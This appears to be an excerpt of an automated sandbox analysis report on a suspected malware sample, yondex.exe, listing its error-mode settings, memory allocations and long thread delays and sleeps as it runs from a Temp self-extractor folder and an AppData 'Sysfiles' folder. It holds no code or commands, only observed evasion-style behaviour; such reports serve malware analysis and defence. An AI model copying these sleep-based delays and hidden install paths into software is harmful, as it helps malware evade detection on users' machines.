                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                  Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Memory allocated: 13F0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Memory allocated: 2DA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Memory allocated: 4DA0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: C70000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: 2710000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: 4710000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: 2EF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: 3060000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: 2EF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: E60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: 27E0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Memory allocated: E60000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Thread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577804
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577659
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577368
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577234
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 577078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576960
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576651
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576499
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576344
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576187
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 576054
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575890
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575634
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575487
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 575078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574951
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574681
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574531
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574394
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574258
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 574078
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573920
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573781
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573646
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573510
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573362
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 573064
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572791
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572659
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572377
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572236
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 572107
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571980
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571712
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571422
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571285
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571154
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 571026
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570760
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570616
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570182
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 570047
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569891
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569750
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569464
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 569062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568922
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568756
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568620
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568469
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568198
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 568071
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567937
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567801
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567668
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567531
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567404
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567275
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 567000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566687
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566553
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566410
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566265
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 566109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565997
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565866
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565718
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565588
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565462
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565342
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 565084
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564946
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564812
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564406
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564277
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 564140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563844
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563703
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563515
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563375
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563250
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 563109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562966
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562836
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562359
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562211
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 562079
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561935
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561640
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561493
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561348
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561210
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 561062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560930
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560804
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560625
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560453
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560305
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560140
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 560015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559858
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559727
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559578
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559462
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559321
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559163
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 559015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558889
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558757
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558594
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558451
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558315
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558166
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 558015
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557875
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557742
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557605
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557471
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557203
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 557062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556943
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556811
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556684
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556500
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556354
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 556062
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555931
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555797
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555686
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555529
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555364
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555219
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 555085
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554984
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554874
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554765
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554656
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554547
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554437
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554328
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554218
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554109
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 554000
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeThread delayed: delay time: 553890
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Window / User API: threadDelayed 1129
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exe Window / User API: threadDelayed 3431
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Window / User API: threadDelayed 5507
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Window / User API: threadDelayed 2391
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe Window / User API: threadDelayed 486
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -600000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8176Thread sleep count: 5507 > 30
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -599469s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -599265s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -599031s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598812s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598625s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8112Thread sleep time: -180000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598406s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598187s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -598031s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597765s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597574s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597390s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597203s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -597015s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596890s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596778s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596658s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596498s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596338s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596217s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -596052s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595922s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595807s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595685s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595546s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595378s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -595102s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594961s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594806s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594661s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594500s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594386s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594219s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -594062s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593936s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593797s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593640s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593530s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593393s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593234s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exe TID: 8168Thread sleep time: -593104s >= -30000s
